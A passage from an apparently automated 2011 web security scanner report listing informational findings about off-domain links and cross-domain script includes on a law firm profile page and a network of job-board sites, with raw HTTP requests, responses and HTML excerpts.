<IFRAME SRC="http://ad.doubleclick.net/adj/N2724.deduped_spotlight/B3720575;abr=!ie;sz=1x1;TAG=TFS_Homepage_Traffic;ord=%n?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- Begin ad tag -->
<img src="http://ad.doubleclick.net/activity;src=1270268;dcnet=4155;boom=16839;sz=1x1;ord=1?"width=1 height=1 border=0>
<!-- End ad tag -->
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://ad.doubleclick.net/adj/N2724.deduped_spotlight/B3720575;abr=!ie;sz=1x1;TAG=TFS_Homepage_Traffic;ord=%n?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

14.23. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:07 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000Teb9VfCYzGhr2FZKSSc1gr-:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:10 GMT;path=/
Content-Length: 92849


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</script>

   <SCRIPT type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=null" >
   </SCRIPT>
...[SNIP]...
<div class="tool-email">
       <a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421" addthis:title="http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421']);">
       <img src="/images/icons/email.png" width="25" height="21" border="0" alt="Email" />
...[SNIP]...
<div class="tool-share">
       <a class="addthis_button" addthis:url="http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421" addthis:title="http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP" href="http://www.addthis.com/bookmark.php?v=250&amp;username=vaultaddthisuser" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Share', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=421']);">
       <img src="/images/icons/share.png" width="20" height="21" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
<!-- /utility -->


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

14.24. http://www.velaw.com/lawyers/lawyersearch.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /lawyers/lawyersearch.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /lawyers/lawyersearch.aspx?id=1134 HTTP/1.1
Host: www.velaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 18:35:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Vinson &
...[SNIP]...
<td><a href="http://twitter.com/vinsonandelkins"><img title="Twitter" alt="Twitter" src="/uploadedImages/VEsite/Careers/twitter.jpg" align="left" border="0" />
...[SNIP]...

15. Cross-domain script include
There are 439 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


15.1. http://www.100kcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.100kcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4gi6e55n6c5ims48r8g0gv1692; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106106

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.2. http://www.accountingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accountingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m8i6cd531h6rsd383n5t999356; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116767

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.3. http://www.accountmanagementcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accountmanagementcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bvhhpa1stegtb9iluknr76tt84; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137270

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.4. http://www.actuarialcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actuarialcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gfsjuvk6a0eja28o52r05s3445; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114356

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.5. http://www.admincrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.admincrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9hecq37ajcfirr9ve90dobkne6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109804

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.6. http://www.advertisingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advertisingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.7. http://www.aerospacecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aerospacecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=smekqvtb2jtrk9a1sqbg5kk4u3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.8. http://www.agriculturalcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agriculturalcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukabttsk8nejv6h58lpcqprfk1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102618

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
